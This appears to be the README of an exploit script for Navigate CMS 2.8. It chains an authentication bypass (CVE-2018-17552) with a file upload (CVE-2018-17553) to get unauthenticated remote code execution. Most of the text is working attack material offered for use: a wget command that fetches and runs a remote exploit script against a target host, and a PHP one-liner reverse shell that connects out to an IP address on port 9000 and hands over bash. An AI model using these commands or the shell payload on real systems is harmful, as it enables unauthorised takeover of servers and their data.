This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8
This script exploits:
- CVE 2018-17552 # Authentication bypass
- CVE 2018-17553 # File upload
wget https://raw.githubusercontent.com/0x4r2/Navigate-CMS-RCE-Unauthenticated-/main/navigate_RCE.sh
./navigate_RCE.sh navigator.hm
Getting a simple webshell. Enjoy!
php -r '$sock=fsockopen("192.168.153.133",9000);system("/bin/bash <&3 >&3 2>&3");'